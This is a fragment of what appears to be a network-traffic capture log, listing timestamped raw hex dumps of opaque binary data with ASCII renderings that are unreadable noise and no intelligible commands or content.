                                        2021-09-22 19:00:56 UTC1323INData Raw: ab 37 b9 08 59 ab 72 86 09 30 8a a7 0e 85 ea a0 ef 09 74 a2 32 75 b8 fc c1 c9 79 b3 1d c5 53 6d 38 31 e6 e5 44 4f bd f5 98 d8 31 ad df 23 55 b0 d5 06 9f ff 21 07 dd a9 13 e8 20 0f 4f c3 0d cf 7d 9a 6b 22 ec cb 47 6d 6c 8f b6 ff be a4 09 39 2b 7e 24 f7 f2 d9 35 c3 36 e4 e6 50 65 b4 d8 e4 7a 48 e3 77 a5 14 76 e4 8f a7 18 10 08 a6 84 10 1c c9 70 67 db 23 fb 20 ae 28 c2 26 83 b2 9f 8f 8e 8f 8f 65 d5 64 a8 d8 65 ca 4e 7e de 36 53 70 03 b0 a2 3f 56 b4 6e ef 60 9b 84 61 15 e2 0f 39 a1 fe 6b eb a2 2c 4f a6 be b7 b7 8f e6 8e 6f 53 58 8c 6c 27 76 35 a7 a9 62 ff 2b e4 8c 49 f3 13 a4 a0 0a 07 41 ee 3f 43 92 8b 27 3e 94 98 48 2a 39 4f fd 84 4a 35 29 e8 3b 4a 66 28 74 01 5a 16 15 45 b6 e2 61 b0 23 92 bb 47 1b 66 30 e7 a4 46 aa 6d 8f 0b 9c cb b1 21 0e 82 fa fd eb 7c a1
                                        Data Ascii: 7Yr0t2uySm81DO1#U! O}k"Gml9+~$56PezHwvpg# (&edeN~6Sp?Vn`a9k,OoSXl'v5b+IA?C'>H*9OJ5);Jf(tZEa#Gf0Fm!|
                                        2021-09-22 19:00:56 UTC1339INData Raw: 31 9d 19 7d 80 d9 b2 05 db be a8 25 ba 6b da f7 4c 57 f8 f3 fe ea e7 2e 6f 9d 7f ea 8c 5a a2 e3 73 37 80 6b 65 e7 b6 20 25 ef d5 be d1 85 b3 6a 64 68 30 de 4d b7 30 16 c9 b6 c3 e4 2f 64 d2 1b db 92 9d d6 04 d5 67 75 c2 3b c0 8f 5d e7 92 b4 4a b3 19 9e c4 47 61 ee 69 77 4b f4 94 b9 30 76 43 d2 82 6a 8e ca 10 4f 7c 23 e3 07 06 0b 54 e6 f3 48 38 db e4 b9 4e d1 32 ef aa 31 be 3b 7e 71 33 63 c5 5f 9f 6f 8a 0a fd 31 11 38 4e f8 08 b5 a0 a8 88 51 ab 7a 86 76 f1 f1 a6 5c f1 86 bf ab a7 75 83 3d fc 27 25 4a 5a e8 8f 0e 56 d5 89 fe 21 78 bb fc 4e 8e b3 85 f1 f9 29 92 16 a6 10 19 98 bc 2a ed 9c 04 17 8b 91 20 fb fd f4 84 e7 3c 3f b7 59 ec 72 4f 8e 6e 5c e5 fc a8 bb 31 c6 90 cf e1 14 99 bc 45 46 f0 0e 65 61 43 cb e5 b9 17 55 32 d8 a3 ba 90 06 30 5a 16 08 08 fe fe c2
                                        Data Ascii: 1}%kLW.oZs7ke %jdh0M0/dgu;]JGaiwK0vCjO|#TH8N21;~q3c_o18NQzv\u='%JZV!xN)* <?YrOn\1EFeaCU20Z
                                        2021-09-22 19:00:56 UTC1355INData Raw: 44 69 3b d6 a6 30 25 ac 4c 66 b3 c6 82 fe e8 c1 e6 d2 89 7b 4b fd 6a a2 37 db 31 ab d0 94 01 5a 97 8c 0a e3 3e 54 94 00 dd 3c 55 0c e0 a4 3a 45 f6 f4 f4 e6 d3 0e e5 57 1a 1b 8b 68 bd fe ef 5f 0c f5 77 46 6a a5 b0 53 10 f8 eb 50 7d 72 da a1 a1 a9 c4 76 cc 81 62 b6 40 4b f1 4b e1 30 2b b9 f7 6b 2e 3a 5c 8d 85 61 3c 43 f7 69 27 ad ca 9c 2f b0 51 03 45 f5 6a b9 e2 b8 6b 24 12 fc e6 db 3e 55 1c 1f 98 08 f5 74 cd 18 0a f7 7e e5 57 11 65 39 ce 83 66 ad dc bb ee d6 a0 3e 44 69 3b d6 a6 30 25 ac 4c 66 b3 c6 82 fe e8 c1 e6 d2 89 7b 4b fd 6a a2 37 db 31 ab d0 94 01 5a 97 8c 0a e3 3e 54 94 00 dd 3c 55 0c e0 a4 3a 45 f6 f4 f4 e6 d3 0e e5 57 1a 1b 8b 68 bd fe ef 5f 0c f5 77 46 6a a5 b0 53 10 f8 eb 50 7d 72 da a1 a1 a9 c4 76 cc 81 62 b6 40 4b f1 4b e1 30 2b b9 f7 6b 2e
                                        Data Ascii: Di;0%Lf{Kj71Z>T<U:EWh_wFjSP}rvb@KK0+k.:\a<Ci'/QEjk$>Ut~We9f>Di;0%Lf{Kj71Z>T<U:EWh_wFjSP}rvb@KK0+k.
                                        2021-09-22 19:00:56 UTC1371INData Raw: c9 48 d6 e1 80 db 95 a1 14 08 5a 73 f0 18 bf 4d 43 52 38 e0 02 76 6b 0f ca a6 80 c4 c6 9d 1c 18 be bb 52 44 de 08 5b 81 d0 e8 73 33 06 b1 6b 5f a6 64 13 28 9e 61 9a 13 c0 61 9a 20 ac b4 e0 5e 24 c4 c5 2c 89 b1 6b fb cd b5 62 14 42 ca 30 9a 99 04 61 b1 6b b3 6f c0 cb 71 fe 88 41 b4 e1 6d 86 ba de f2 58 ae f4 d2 22 34 f9 49 57 10 4b e5 fc f2 58 67 88 12 40 19 30 54 31 d3 aa 27 13 19 30 64 1c 55 bf a5 0e be d8 eb e7 00 66 ea 79 18 b2 6c 0d 74 7b 58 26 23 2a d7 93 69 83 9a 96 e7 fe 16 b6 b5 6d da 1a e8 7c 02 62 7e 55 d9 9f 1b 3d 75 f9 f3 d4 07 e9 d8 11 e5 f2 6c 0d e4 77 d7 93 11 c0 0f c5 86 41 aa f6 99 2b c5 4b bb 5d 26 96 2f 03 65 99 b7 6a 93 24 01 e7 52 36 55 bc 63 9d 59 a7 44 d1 f6 5c 7f d0 4b 46 ba d3 d4 2a 96 a2 82 5e 3e e2 2f 03 d0 22 60 15 14 4f a3 00
                                        Data Ascii: HZsMCR8vkRD[s3k_d(aa ^$,kbB0akoqAmX"4IWKXg@0T1'0dUfylt{X&#*im|b~U=ulwA+K]&/ej$R6UcYD\KF*^>/"`O
                                        2021-09-22 19:00:56 UTC1387INData Raw: 10 73 cb ee 24 f1 b2 97 7d 8f 61 e5 c4 fc 76 51 c1 10 1f 7a 1c f9 9c d6 4a b7 3b 3e be a8 be ee 57 f7 99 7f 97 7b b5 17 67 d5 d3 da 2c b0 d0 57 eb bf 18 c8 60 4f 1d 62 4b 1c ce 65 c9 c1 75 cf 94 93 63 c7 f0 2e f1 aa b0 b1 1e e5 a1 68 33 3f 59 92 cf fb 92 e0 70 21 74 2c d3 f3 ae b8 84 37 48 ed d5 a1 6e 25 4d 19 48 88 15 94 d5 c4 90 ff 98 f4 29 5d fe 3d 55 89 fb f4 25 45 0a 01 bc 8b b7 3a a2 c4 98 f4 29 5d fe 3d 55 89 fb f4 17 71 a3 46 8c e5 85 91 63 da 7c 2a ce 56 0b e8 4a b0 bf 17 6c 72 39 39 38 b8 80 13 aa b7 3a 89 fb f4 64 4f 10 12 14 14 37 2c d1 fd 8a 15 a9 35 26 e4 41 5e 1d 0f b1 2a ee 2e c6 61 d1 fa 18 c8 60 40 b4 95 15 fd f8 2c de 4d 08 02 26 d7 d6 4f 7c 5e 1d 0f b1 3c b6 b1 20 e1 c8 68 33 3f 59 e0 58 78 15 98 ff 95 42 8f 5c 7d 95 6c 79 b1 26 cf e1
                                        Data Ascii: s$}avQzJ;>W{g,W`ObKeuc.h3?Yp!t,7Hn%MH)]=U%E:)]=UqFc|*VJlr998:dO7,5&A^*.a`@,M&O|^< h3?YXxB\}ly&
                                        2021-09-22 19:00:56 UTC1403INData Raw: 82 3b 58 34 85 7f 1a 73 b7 b9 8c d6 73 c7 a6 fe f1 8e 92 aa 87 7b dc 30 b9 47 03 86 70 60 65 21 e7 33 42 c8 ec 03 f8 49 2b a0 f8 4b 57 ca 80 98 60 5a a3 dc 66 2e f0 ae e4 29 0b cc 49 e6 b9 9f 50 38 22 cc 0d a8 4c ee 3f a9 ca f6 92 f5 2c 58 10 37 ba ee 3f 47 4f 38 43 78 96 14 6e bf 6d 9a e4 86 12 6f e6 12 fe a8 8d 6b ae e8 0e a8 ad 6d ea c6 16 d0 9b 37 b7 4e de 70 83 88 74 69 e1 32 a3 64 a7 54 0b cc 49 a9 65 a8 35 43 62 26 0a e1 b4 d9 8d 3f da 08 65 25 df 4c 8b b7 b7 08 61 c9 86 74 4c d5 c9 86 74 5d 9b 4a b1 38 11 c6 f8 e6 ac 4c 09 1c 73 1b cf 15 a8 e9 9a f3 e2 7d 6c 3b 58 d2 47 8e 0d b7 01 8d c5 f5 18 7f 98 81 01 81 b9 9c e1 30 ef 89 f7 ae 47 3b a4 f3 6f 3d ae b1 ff 14 2d cd e5 df c3 79 d0 6b 39 bc 61 5c e3 c4 79 30 eb d1 f2 60 4b 23 e0 7c d5 f1 26 e6 cd
                                        Data Ascii: ;X4ss{0Gp`e!3BI+KW`Zf.)IP8"L?,X7?GO8Cxnmokm7Npti2dTIe5Cb&?e%LatLt]J8Ls}l;XG0G;o=-yk9a\y0`K#|&
                                        2021-09-22 19:00:56 UTC1419INData Raw: 33 0f a7 b7 af 0b 65 a7 d7 5a ef 42 cd 67 80 30 33 cf d1 15 21 55 02 ab ba 3f 56 e3 79 53 59 c7 0f ea 3b a6 3f 3f 39 3b db c8 df 84 72 a2 d1 c6 8a 78 22 5a 90 75 34 4a 3c 3b 50 ba 60 69 a0 26 65 27 3d be 35 70 40 af b8 64 d5 5a 97 3b b8 e1 bb 68 23 a6 73 f8 8d 46 65 af 4e 79 d0 53 0e 68 46 33 bb 67 b0 53 79 9d ad 4f 09 38 4e f0 28 67 34 01 e1 44 1b f4 9d 26 64 d6 66 a5 33 d4 1e 21 18 84 70 54 07 18 8c c4 77 da 59 49 eb d1 98 9b 32 bd ab b9 21 93 0b 9d e6 c2 eb 83 11 e5 4f 30 ff 77 f5 93 11 b9 1b 88 4e 11 f4 d4 1d 86 7c 0b 63 98 db 25 d4 5a 9f 20 e0 e2 b9 66 a7 c0 a6 31 0f b0 5b 62 63 23 02 21 c3 fd fc 09 1c cd f0 df 9f 5f 9f df ca 8a 18 6f 02 67 4f 83 11 0b e8 8d ff b9 ef d9 a9 41 5b 96 50 f6 2c 3b 46 9d d9 52 9e bb 80 67 f4 d6 5f 25 10 34 4a 05 9e 20 6a
                                        Data Ascii: 3eZBg03!U?VySY;??9;rx"Zu4J<;P`i&e'=5p@dZ;h#sFeNyShF3gSyO8N(g4D&df3!pTwYI2!O0wN|c%Z f1[bc#!_ogOA[P,;FRg_%4J j
                                        2021-09-22 19:00:56 UTC1435INData Raw: e5 4f bf 8e 7a 85 c9 6e 81 62 21 6c f2 e5 88 31 b0 d4 5d 12 b7 d4 dc 6b e7 97 44 39 39 03 90 8e 6d 41 a2 6e e5 2c fc 35 c8 d2 91 08 24 17 c2 c4 ed a0 45 5d 64 d6 c3 a5 d0 5a 57 05 0d 67 46 db e9 ea 33 c0 76 1e 99 66 a5 16 f4 a4 33 73 88 f2 b8 6a dd 39 19 51 d6 70 44 a4 3b 93 4a af 11 a8 de 67 4f 18 c7 09 30 33 37 3c d3 fe 01 51 e6 af 3b 1f 56 f4 9f e7 b3 be 11 0a db c8 fb 08 80 43 8a 31 78 dd 67 3b bd 5f d8 3d 29 d6 a6 f5 ef a1 a4 94 e7 08 e4 0d af c5 46 97 19 5a 6f 41 5f c7 c1 b3 8e 0d b9 33 69 e6 85 a9 be 12 bb 8a 95 d5 92 5c 2b e6 cd 55 02 07 1c d3 63 53 49 ad a1 d0 f9 51 e6 80 ec 13 af c6 0e 1a c8 52 39 bc 61 f5 24 c3 20 ce 4f 8c 6a c8 ff 2e 93 f8 ae 33 c4 24 6b 51 7c 1b 86 74 09 92 89 93 01 5b f2 39 15 a7 fc 45 99 e5 16 fa 99 e1 47 3b 7f 0d ec 12 59
                                        Data Ascii: Oznb!l1]kD99mAn,5$E]dZWgF3vf3sj9QpD;JgO037<Q;VC1xg;_=)FZoA_3i\+UcSIQR9a$ Oj.3$kQ|t[9EG;Y
                                        2021-09-22 19:00:56 UTC1451INData Raw: e2 d5 73 f8 ae cc 0d ec 52 eb d4 6b a9 41 5e 1d 81 69 43 6c 4e fa 71 c6 00 dc 88 fa 17 02 54 07 53 0d 13 9f e8 4a f1 de b8 61 5c 7e 63 e8 c7 41 03 33 b4 82 89 10 8c 7d f0 da c5 bd 6c 3b 72 b1 ba e6 03 ed e5 65 53 d0 9c a9 35 43 62 63 93 21 25 a3 34 85 c3 d1 f0 4c 7f 81 b0 89 a1 ef ea b0 2d 99 c9 6e bf 71 c6 07 65 ac c7 82 e3 3c 58 ef 24 35 a4 5e e2 3d 55 9e 13 f9 ef d9 29 aa 48 12 8a d0 a5 d0 16 80 67 38 49 e4 91 87 09 1f 2d b6 35 4e 90 75 32 13 52 eb d1 98 9b 2a 11 f5 e7 c8 84 f3 69 91 e7 37 b5 f6 b0 38 ca 09 e3 37 cb 00 80 ec ac 3b 6e 52 eb 81 16 7f 1a 87 73 46 17 ff 51 72 a1 2f 36 c5 fe f9 64 fa fa 8e 7a 64 01 3a 9e 56 f4 9b 69 30 35 77 a7 fc f3 1d f3 a6 81 01 fb 9e a9 2b 7d 1e 6e be 81 6c b6 dd d8 27 25 21 4c 09 1c 73 a4 33 f8 92 73 65 87 1e 91 0c 6a
                                        Data Ascii: sRkA^iClNqTSJa\~cA3}l;reS5Cbc!%4L-nqe<X$5^=U)Hg8I-5Nu2R*i787;nRsFQr/6dzd:Vi05w+}nl'%!Ls3sej
                                        2021-09-22 19:00:56 UTC1467INData Raw: 4d be 65 7c d5 a1 2f 35 ca e1 7d 6a 27 50 fe 7a 5a 15 58 ae 4c ef ac c5 42 e4 35 41 a5 b8 e1 bb 6a 18 1a 00 50 fe 78 79 5e 97 e6 b9 47 69 5d 5d 10 74 38 da 30 fe 8c 81 e9 cf ab ad 8f 83 ef 6b b0 a5 38 ca 09 e1 8b 41 de 26 d6 22 61 23 71 b2 d4 1f 11 da b2 ee a7 b7 85 79 8e d5 a1 6f 4f bf 2a aa 73 08 3a 0e 5d 9f 5e dd 37 b7 a1 14 5c f0 5c 18 86 34 42 6b b6 a9 81 6d 41 a1 d0 f8 85 31 b0 08 ea 1c 4d f3 21 19 32 e3 ff 76 92 86 25 df bf fa 71 c6 02 14 fb 7f 75 0c 6a 37 4a c9 06 d6 b3 95 4e a4 e9 91 56 2f 32 36 1b 7e 28 e1 bf 9a 84 74 c4 fc 76 68 bc 02 54 42 6b 6f 49 60 54 03 ae f7 eb d1 a1 b1 ba e6 03 5d 4d f3 14 48 ae e9 b0 0b 6d f5 3f d2 1a 88 40 1d e7 c8 41 d5 71 39 4c 7d e1 fe 5f 77 72 49 05 db c4 ac c7 c1 85 d6 9b 72 11 b5 d0 16 c5 f5 ef 8b 00 40 50 a6 fa
                                        Data Ascii: Me|/5}j'PzZXLB5AjPxy^Gi]]t80k8A&"a#qyoO*s:]^7\\4BkmA1M!2v%quj7JNV/26~(tvhTBkoI`T]MHm?@Aq9L}_wrIr@P
                                        2021-09-22 19:00:56 UTC1483INData Raw: 41 5e 1d 0f b3 a7 6c 3b 13 28 9b dd b2 d6 2b 2d 71 66 ea 2a c7 eb 97 69 d9 cc 45 6e 40 f1 5e 1d 0f f0 dc 30 b8 e1 bb 68 33 3e 28 a7 3e eb 2e b4 db 92 8e c6 10 e7 bc 82 0c 03 b3 1e 97 19 03 56 0b e8 4a 71 c6 00 50 fe 39 ae c0 f3 a0 7d 89 04 58 10 3f 59 d2 0a 59 f7 87 8f 7c 0d 81 9b 4d 3e de 34 e8 4a f1 de 34 41 5e 1d 0f f0 1f e2 6d be ad b8 61 5c 18 86 5b 96 d4 ba 7e 17 6c 54 41 5a 14 53 05 db ae cc 8d 03 d6 23 1c cf 4d 04 58 52 da 40 24 9e a9 29 29 68 f4 f4 10 1d 60 67 c4 92 eb a3 55 d9 a3 34 e6 46 e8 4a f1 5e 1d 0f f0 5c 18 84 71 c6 42 39 e8 b5 5b 96 ce 11 b5 4b 73 af 2b 41 3c b2 ba a3 33 3f 7f e5 c4 fc 77 53 85 f2 60 21 5a ec 03 28 a7 3c b7 a1 2f 36 95 15 bd 7c 5e 78 32 d2 57 e9 ad 3b 14 73 cb ae cc 0d ec 53 05 db ae cc 0d ec 53 84 8e 86 74 2d cd 8f 08
                                        Data Ascii: A^l;(+-qf*iEn@^0h3>(>.VJqP9}X?YY|M>4J4A^ma\[~lTAZS#MXR@$))h`gU4FJ^\qB9[Ks+A<3?wS`!Z(</6|^x2W;sSSt-
                                        2021-09-22 19:00:56 UTC1499INData Raw: ef ad 81 17 42 94 5b 68 3f 1c 07 df b7 5f 70 ca 06 a2 34 9f 74 e8 ef 7c fb 0c e1 5f ea c2 a0 fb fc 33 b4 26 5e d1 1b e3 7f d6 f1 ed 1d 84 8f f7 8b 21 f0 48 ab ce 41 ba a3 b9 34 3e 28 c6 2f de 20 d3 17 02 54 07 73 46 e7 ca f6 ea 46 9c a4 b6 dd b2 48 56 8b ed a1 f4 e1 43 e9 33 c0 4a fa 99 0a 23 97 e9 47 b2 5f c8 52 50 1a 4c 75 23 97 4c 35 1e 74 c6 5b c8 5b 66 c5 81 15 2c 79 31 f8 92 72 83 91 e4 bd 29 a2 b1 11 84 15 95 05 52 67 e9 95 4f bc d9 59 79 27 d9 78 b0 39 8f f7 15 84 14 93 ed 90 01 d2 59 e3 f7 83 fe f3 86 2d 6b e3 7f d6 cd 64 d5 5d 49 6c d2 d9 56 f5 9c ad a1 d3 d9 22 48 de 34 82 1a a3 5c 08 e8 2e ed 8c db 6e 73 34 3e 28 dc b5 54 f3 af b1 aa 86 8b ef 8a 82 73 40 1d 84 8c d4 94 58 9b 72 ad 0c e7 38 8f 21 d8 24 5c 33 d7 f0 77 23 49 e4 0d af c5 92 cb a2
                                        Data Ascii: B[h?_p4t|_3&^!HA4>(/ TsFFHVC3J#G_RPLu#L5t[[f,y1r)RgOYy'x9Y-kd]IlV"H4\.ns4>(Ts@Xr8!$\3w#I
                                        2021-09-22 19:00:56 UTC1515INData Raw: 75 cf 95 95 93 9a f0 5c 5d a1 97 1c 3a c1 8a 80 25 b6 35 13 f9 ef d8 a7 ba 6d ee 57 cb b1 e8 4f cb 84 80 36 3a c6 8b 39 c7 72 c2 a1 ec 08 3f a9 10 8c 89 70 82 e0 ea c4 f5 92 4e 7e 9c 5b 7c 62 ce 19 45 ed 06 d6 d3 17 d8 ac 91 5f 5f 14 b8 ba b8 be 1e c0 0c 62 ad 8e 0d 3f d2 13 8c 41 da d3 63 42 bf 99 16 c3 f2 b3 dd bc 9f 29 d7 26 c5 78 22 9b dc b3 30 bc 99 95 73 33 b4 03 5d cc 5b c5 bd 37 16 70 15 02 5c 93 d7 2e 67 3b 59 e7 08 e5 3b af a4 26 4b 7b 9f a0 7e e8 ba 6d 64 a1 79 8b 6f 01 8f 51 db f0 ac 96 68 3b db 6d 35 bf 24 15 f7 9e 69 31 62 d9 56 f5 5a fc b5 d0 43 6f b7 5f 9f da 2c 8d 03 d6 dc c0 d6 27 65 27 d9 ec d8 0e 1b cb 0e 91 f3 5a e3 57 48 66 2e b4 69 a2 0b 21 2b 7d 1d 4a 7a 4c 82 9d a3 c4 77 d3 9c 35 18 6c f8 e6 65 d8 63 f0 67 b0 5b 96 d2 3c 8b 5e 32
                                        Data Ascii: u\]:%5mWO6:9r?pN~[|bE__b?AcB)&x"0s3][7p\.g;Y;&K{~mdyoQh;m5$i1bVZCo_,'e'ZWHf.i!+}JzLw5lecg[<^2
                                        2021-09-22 19:00:56 UTC1531INData Raw: bd e7 1b 80 af c5 7e 63 67 9a 48 e9 8a f6 0f a0 a7 7a e5 cb db a6 fc c9 89 d9 dc 20 c4 bb 9e 51 0b 1a 03 0f 7b 8b a9 12 b7 d4 1f 1b c9 db f7 b0 d0 16 80 87 65 53 85 f2 60 c5 fd 73 1b 80 ad c2 2f bd 3d 5d d6 a8 ef d5 ec d8 76 ae 81 63 b6 a9 41 5e 1d 0f 12 cf 17 64 d5 ec db fd a9 ad c2 a2 72 12 29 73 92 71 3b 1c e0 d1 67 64 94 f5 24 15 f5 a9 fe 75 1f 98 9b 22 55 13 11 f1 98 10 15 ad 43 24 21 17 1d e4 be 13 b5 d5 49 90 5e a3 52 c0 78 52 27 69 3e 07 54 07 df 78 ed 3d 51 c6 8b 99 4e fe 5e 59 19 f9 10 84 e5 2c 73 40 0f 7b f6 17 02 54 87 f6 25 5b 17 0b 97 19 06 dd b2 9c df 36 9e dc 20 c4 bf 87 06 0c 95 1d 84 b3 dd 64 a1 f7 60 d3 17 fa b5 d8 71 95 15 f9 2d 6f 9b 79 d8 27 25 f8 fe 85 f2 60 21 c4 7f 6e bf 3c 59 42 6b 61 28 f5 ef 8c 0a 34 d9 dd b2 d4 1f 13 23 a4 35
                                        Data Ascii: ~cgHz Q{eS`s/=]vcA^dr)sq;gd$u"UC$!I^RxR'i>Tx=QN^Y,s@{T%[6 d`q-oy'%`!n<YBka(4#5
                                        2021-09-22 19:00:56 UTC1547INData Raw: 58 d8 a4 b5 b0 d8 6d 37 81 da d3 54 84 7a 2f 04 63 b9 8f 09 f7 a9 87 36 f6 61 d6 2b 5f a4 65 27 2d 45 ef da 58 d0 93 ee aa 01 bd 84 20 65 e9 41 52 74 b2 c4 8b 00 af b3 97 9f c3 2f 66 de 71 4b 53 f0 5c 10 0c e9 8a 96 57 bd 68 46 ec 24 a5 c3 f2 68 46 63 a4 eb 5a 43 34 92 7e a7 bf 9d ad 1c 8d 43 ef 1a 48 66 ed d5 a1 2f 32 05 db ee da 2c b4 1b 56 cb b8 0d 67 e5 54 c4 a2 4e 07 53 06 b5 a4 6c 85 94 ab 03 5d 4d f3 12 fc 20 05 18 da d3 61 2f a1 c7 7d 3a 70 22 a2 f7 60 f7 60 d1 13 af 8e 0d 2f 6d e0 66 3e 13 7a a5 c5 bc 3b b8 b1 16 c3 f4 32 63 5f cf 4c 01 dd c6 c0 76 55 fc 80 e2 fd cb 89 10 8c 7e 9c 20 7d 73 0a ee 9f 00 5c 3c 9f a0 7d ca 1b 75 c3 5d df 8c 87 8a bf 4a f5 c3 2d b9 74 0e e5 32 8e 84 9b d2 91 f3 1d f0 f7 03 44 25 ab 8d 28 af 6a 7b 57 5e 36 d1 e6 4e de
                                        Data Ascii: Xm7Tz/c6a+_e'-EX eARt/fqKS\WhF$hFcZC4~CHf/2,VgTNSl]M a/}:p"``/mf>z;2c_LvU~ }s\<}u]J-t2D%(j{W^6N
                                        2021-09-22 19:00:56 UTC1563INData Raw: cf d6 4c de 34 84 67 50 fe 38 a5 08 61 e6 51 68 33 7d 8e be ee 12 60 d1 98 d9 c6 40 db eb c6 f8 6d fc 19 4e fa 34 d9 a9 41 1c e2 6d be ab 5d 93 11 b7 30 e0 39 09 fb e4 41 1c e2 5d 9b 67 a8 a6 ba a4 d9 c1 75 8a 65 8c 81 ab 2a db ae 89 e3 97 19 44 8b 87 f6 2c a8 8e 86 36 aa 43 62 63 b0 e8 4a b3 39 c4 fc 33 27 65 ac 85 9d b6 dd f7 f3 aa c3 3b 3f c1 75 8a 65 fc 76 13 96 37 48 a8 a6 e2 3d 17 6d 16 80 22 82 0b e8 08 0e de 34 84 68 5b 96 d5 ce a9 41 1b 13 89 fb b6 b2 14 7b 99 06 25 20 d7 ca c1 75 8a 65 2c b0 92 e1 6b b9 21 00 d8 27 67 df 6f c2 b2 cc 9d 26 e1 d4 ff fc 33 27 bd 6c 79 b7 b7 5f da 34 61 a3 76 3e 27 25 65 b4 71 c6 42 8f f0 5c 5d 83 5e 1d 4d 08 61 a3 71 de 8c 81 ab 35 4b 73 8e 9e 69 b5 19 76 41 5e 58 08 a9 41 1c fd e0 39 09 fb 24 9e eb a1 0f f0 19 1e
                                        Data Ascii: L4gP8aQh3}`@mN4Am]09A]gue*D,6CbcJ93'e;?uev7H=m"4h[A{% ue,k!'go&3'ly_4av>'%eqB\]^Maq5KsivA^XA9$
                                        2021-09-22 19:00:56 UTC1579INData Raw: 5f 7d 94 9f 5b ad b1 17 89 11 80 6f 9a 9b da 69 3e c7 f6 69 4d 05 58 e8 0f 79 d8 ac 3f 1c 06 55 62 de 71 4f 78 16 0b 14 3e 5c 38 43 06 6d 41 3a ce 53 b7 72 21 4d b8 d2 e5 3b af 9e 41 a2 f4 ef 25 65 25 fa fa 80 ec 04 0e 3d ad 8d 80 8b 74 18 44 6f 01 2d cc 31 48 05 8b f7 2b ae 0c e1 78 a9 bf 4a e6 ae 9c ac 07 5c 18 c4 71 05 80 39 b3 a8 b3 88 91 ca 82 6c 45 bd e8 b5 a5 03 f7 03 86 7c 18 09 e3 bf 70 a2 59 54 8c 71 4d a2 3a 31 c5 70 51 68 65 ff fc 36 48 2e ef 87 30 33 33 fb 77 d3 9c a4 b6 d8 a8 da d3 62 28 b9 8c 8e f2 bb ec 95 9e 56 f5 db 67 58 40 d3 da a1 df 3c 09 68 cc f3 ef 07 37 b8 25 a3 3c a7 ee d3 ca 5a 66 4b 14 1a e6 27 68 5d e9 a9 35 37 29 79 8c 8e 86 36 f4 2c b0 90 b1 c2 f7 ab 7e 17 02 14 45 4e fa 31 05 ef d9 e9 f2 50 fe 3a f0 70 44 a4 88 59 92 ce 01
                                        Data Ascii: _}[oi>iMXy?UbqOx>\8CmA:Sr!M;A%e%=tDo-1H+xJ\q9lE|pYTqM:1pQhe6H.033wb(VgX@<h7%<ZfK'h]57)y6,~EN1P:pDY
                                        2021-09-22 19:00:56 UTC1595INData Raw: 2b a6 ea 63 ed 5e 4d 50 bb e3 ef fd bd e7 98 bb 2d b9 34 dd f7 60 71 2a ee dc 60 2d 77 58 40 d3 d9 22 ca f6 97 9d 1d e7 c8 ae cc 24 26 a3 f8 6d 9e 13 d9 20 f1 ee a8 da 2c f1 2c bf 19 53 45 55 65 e9 45 99 e0 47 c0 1b 5b 86 31 b0 80 8b ba 6d 52 46 61 5c e7 36 ca e1 44 1a f5 7f 0d bc ce 54 8c 80 0d ed bf 71 c6 00 cf 11 fa 59 e7 f3 e2 3d 55 21 9d 29 05 86 4f 7c 5e 1d be 6b b6 df 8f 8b ff b9 43 c6 a1 2e 43 27 e3 a7 61 28 b3 23 97 e1 30 44 b1 db 56 46 61 f4 32 ee 8b 3b d3 70 cf c1 b6 de cc cc 0a a5 bb 6b c0 33 ba 27 06 8c 76 90 89 11 02 1d cc cd bc 29 c9 55 89 fb f4 65 14 b3 dd b8 94 97 f3 61 c5 78 22 99 f4 e7 ae c0 87 3c 2c d6 f3 69 25 e3 e2 d8 ac 9c fa 2e 44 a1 a4 50 15 02 aa 91 3d bc 29 d6 dd cc 62 ce 41 ba a3 bf 8e 78 28 df 5f cf 7c 1b 80 67 f1 2e 49 07 cf
                                        Data Ascii: +c^MP-4`q*`-wX@"$&m ,,SEUeEG[1mRFa\6DTqY=U!)O|^kC.C'a(#0DVFa2;pk3'v)Ueax"<,i%.DP=)bAx(_|g.I
                                        2021-09-22 19:00:56 UTC1611INData Raw: 11 a8 5b 1d 54 59 cd af 1d f0 44 6f c6 43 e9 1b 80 9b 6f 49 39 42 94 93 15 86 f7 ff 88 69 a9 02 a2 4e 04 c9 2f de cb 74 5d cd 67 b0 91 21 e8 eb d0 a4 b6 98 bd 4c fb 7f e5 ae 9c 50 bb e5 cf 6c 7e a5 cc 78 df 93 65 6c be ee 57 8e e3 57 4d f3 34 4a c0 86 70 1b 30 8e f3 22 1e 6e be 38 21 f0 a0 e8 c1 a3 bf 35 37 b7 da 24 eb 5a cc 86 8e 0d 10 3e 5e 4a a7 6f 36 01 51 6c b0 85 62 e5 d4 4e 05 d3 17 90 1a 4b 8c 7e bf 77 3b c2 f7 ab c8 c7 42 6b 7a 01 2c ac a4 35 25 f8 e6 15 3d de f7 b0 6f de 57 0d 8a a5 b3 05 1b 80 a4 ed 95 09 a8 3d 33 e7 43 31 3b 10 fe b9 f4 a7 fc 45 66 6e cd 4c 35 47 2b a6 2a 68 68 6d 41 a0 34 f5 0f f8 3e 5c de bf a9 ca fb 7f b3 05 db ee da ef 49 ac 07 ec c3 79 d0 d4 42 0c e1 ee c7 41 9e 9a a0 dd dd e6 46 e8 4a f2 9f d4 e0 c6 00 50 fe 7a 2e d2 7f
                                        Data Ascii: [TYDoCoI9BiN/t]g!LPl~xelWWM4Jp0"n8!57$Z>^Jo6QlbNK~w;Bkz,5%=oW=3C1;EfnL5G+*hhmA4>\IyBAFJPz.
                                        2021-09-22 19:00:56 UTC1627INData Raw: 52 fc 88 a8 37 a0 52 fc 39 b6 35 43 23 37 98 3a cf 26 a3 71 e3 5b 9b a9 56 7f 3d 6e 50 a8 41 6e cb 4d f3 29 a2 66 a5 1e e5 1f 96 67 3b aa 48 34 4a a6 ec 00 c0 30 e3 e1 e4 be 10 a2 70 ac 38 35 13 cb 63 a8 ff d7 dd 13 f8 df b7 1a af 56 06 d6 34 b5 83 d5 ad 1f ec 63 23 da a7 f7 60 f6 e2 1b 7f 3e 52 f3 69 4f f7 32 36 92 d8 74 8d 88 79 d0 d4 42 b9 3d 0e 30 44 b1 d9 51 c5 f5 1b 5e 94 6b fc ff 65 b8 b2 2b 35 c8 c2 7c 95 9f e2 0e be 65 a4 f3 69 4a 0f 22 81 01 2d cd df 3b b8 e1 fb 8a 71 67 b1 e0 39 09 c4 d4 12 fc 61 dd b0 3b 4b 05 a4 49 90 75 c7 ff 7d ea 3a ce 1d 72 ca 1a f4 66 c5 69 c7 02 54 07 df bf 0c eb da 59 6d b2 a9 c2 07 54 dd 39 1a db 56 cf 17 ee dc 65 6c b0 13 a4 53 0e 35 1d 17 53 7a 52 88 85 b7 d4 f9 ba 6c 6b eb 48 2b a6 e3 40 24 61 ea a7 